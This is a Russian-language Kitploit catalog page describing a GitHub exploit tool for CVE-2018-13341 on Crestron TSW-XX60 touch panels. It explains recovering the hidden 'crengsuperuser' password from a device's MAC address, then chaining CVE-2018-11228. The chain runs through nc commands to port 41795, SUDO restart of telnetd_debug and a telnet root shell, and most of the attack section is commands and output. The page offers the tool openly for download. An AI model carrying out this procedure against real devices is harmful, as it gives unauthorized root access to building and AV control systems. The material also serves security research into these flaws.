Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-13341 — Этот инструмент предназначен для эксплуатации CVE-2018-13341 | Kitploit
Инструменты/GitHubGitHub/rajchowdhury240/cve-2018-13341
Безопасность встроенных системАтаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийБезопасность оборудования и IoT
GitHubrajchowdhury240/cve-2018-13341

CVE-2018-13341

Этот инструмент предназначен для эксплуатации CVE-2018-13341

Репозиторий
5 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-13341

Этот инструмент предназначен для эксплуатации CVE-2018-13341. Используя MAC-адрес целевого устройства, вы можете восстановить пароль скрытой учетной записи "crengsuperuser", которая имеет повышенные привилегии и позволяет выполнять команды SUDO.

К протоколу Crestron Toolbox Protocol (CTP) можно подключиться через порт 41795 на устройстве TSW-XX60.

root@kitploit:~
# nc -C w.x.y.z 41795
TSW-760 Control Console

TSW-760> estat

The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
	Link Status ....... : OK
	DHCP .............. : ON
	MAC Address ....... : 00.XX.XX.XX.XX.XX
	IP Address ........ : [removed]
	Subnet Mask ....... : [removed]
	IPV6 Address ...... : [removed]
	Default Gateway ... : [removed]


	DNS Servers ........ : [removed]    | DHCP      |
	                       [removed]    | DHCP      |

Требования

Для работы этого инструмента требуется модуль CryptoGraphy.

root@kitploit:~
# pip3 install cryptography

ИЛИ

root@kitploit:~
# pip3 install -r requirements.txt

Начало работы

root@kitploit:~
usage: exploit.py [-h] [-m MAC]


# Example
# python3 exploit.py -m aabbccddeeff
[*] Device MAC address: AAXXYYZZ
[*] Password for 'crengsuperuser': somerandompass

Эксплуатация CVE-2018-11228

Уязвимость CVE-2018-11228 позволяет неаутентифицированное удаленное выполнение кода (RCE) через службу Bash Shell в протоколе Crestron Terminal Protocol (CTP). После получения пароля скрытой учетной записи "crengsuperuser" вы можете получить root-доступ на устройстве.

root@kitploit:~
# nc -C w.x.y.z 41795

TSW-760 Control Console

TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************

Service telnetd_debug restarted

TSW-760>

Затем в новом терминале вы можете получить root-доступ на устройстве.

root@kitploit:~
# telnet w.x.y.z

bash# whoami
root
root@kitploit:~
Credit Goes to : axcheron 
Скачать инструмент